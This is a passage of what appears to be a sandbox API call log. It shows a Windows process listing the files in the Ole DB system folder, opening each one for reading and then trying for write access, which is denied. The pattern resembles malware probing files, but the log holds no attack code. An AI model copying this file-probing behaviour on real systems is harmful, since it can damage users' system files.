InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.939] AreFileApisANSI () returned 1 [0088.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", lpUsedDefaultChar=0x0) returned 66 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0088.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.940] AreFileApisANSI () returned 1 [0088.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0088.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82b08 [0088.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82b08, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 66 [0088.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.941] GetFileType (hFile=0x348) returned 0x1 [0088.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b08 | out: hHeap=0x20000) returned 1 [0088.942] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.942] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.942] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.942] CloseHandle (hObject=0x348) returned 1 [0088.942] AreFileApisANSI () returned 1 [0088.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0088.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82c28 [0088.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 66 [0088.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.942] GetLastError () returned 0x5 [0088.942] GetLastError () returned 0x5 [0088.942] SetLastError (dwErrCode=0x5) [0088.942] GetLastError () returned 0x5 [0088.942] SetLastError (dwErrCode=0x5) [0088.942] GetLastError () returned 0x5 [0088.943] SetLastError (dwErrCode=0x5) [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0088.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.943] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x82, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8a370, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x82, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="le", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䠀")) returned 0 [0088.943] FindClose (in: hFindFile=0x785d0 | out: hFindFile=0x785d0) returned 1 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0088.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0088.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0088.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.944] AreFileApisANSI () returned 1 [0088.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll", lpUsedDefaultChar=0x0) returned 56 [0088.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.944] AreFileApisANSI () returned 1 [0088.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0088.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 56 [0088.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.945] GetFileType (hFile=0x360) returned 0x1 [0088.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0088.945] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.945] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.945] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.945] CloseHandle (hObject=0x360) returned 1 [0088.945] AreFileApisANSI () returned 1 [0088.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0088.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 56 [0088.946] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.946] GetLastError () returned 0x5 [0088.946] GetLastError () returned 0x5 [0088.946] SetLastError (dwErrCode=0x5) [0088.946] GetLastError () returned 0x5 [0088.946] SetLastError (dwErrCode=0x5) [0088.946] GetLastError () returned 0x5 [0088.946] SetLastError (dwErrCode=0x5) [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.946] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.946] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5be00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdaps.dll", cAlternateFileName="")) returned 1 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0088.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0088.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0088.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0088.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0088.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.947] AreFileApisANSI () returned 1 [0088.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll", lpUsedDefaultChar=0x0) returned 55 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0088.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.947] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.947] AreFileApisANSI () returned 1 [0088.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0088.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 55 [0088.947] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.948] GetFileType (hFile=0x360) returned 0x1 [0088.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.948] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.948] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.948] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.948] CloseHandle (hObject=0x360) returned 1 [0088.948] AreFileApisANSI () returned 1 [0088.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75be8 [0088.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 55 [0088.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.949] GetLastError () returned 0x5 [0088.949] GetLastError () returned 0x5 [0088.949] SetLastError (dwErrCode=0x5) [0088.949] GetLastError () returned 0x5 [0088.949] SetLastError (dwErrCode=0x5) [0088.949] GetLastError () returned 0x5 [0088.949] SetLastError (dwErrCode=0x5) [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0088.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.949] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaa800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdasql.dll", cAlternateFileName="")) returned 1 [0088.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0088.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0088.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0088.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0088.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0088.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 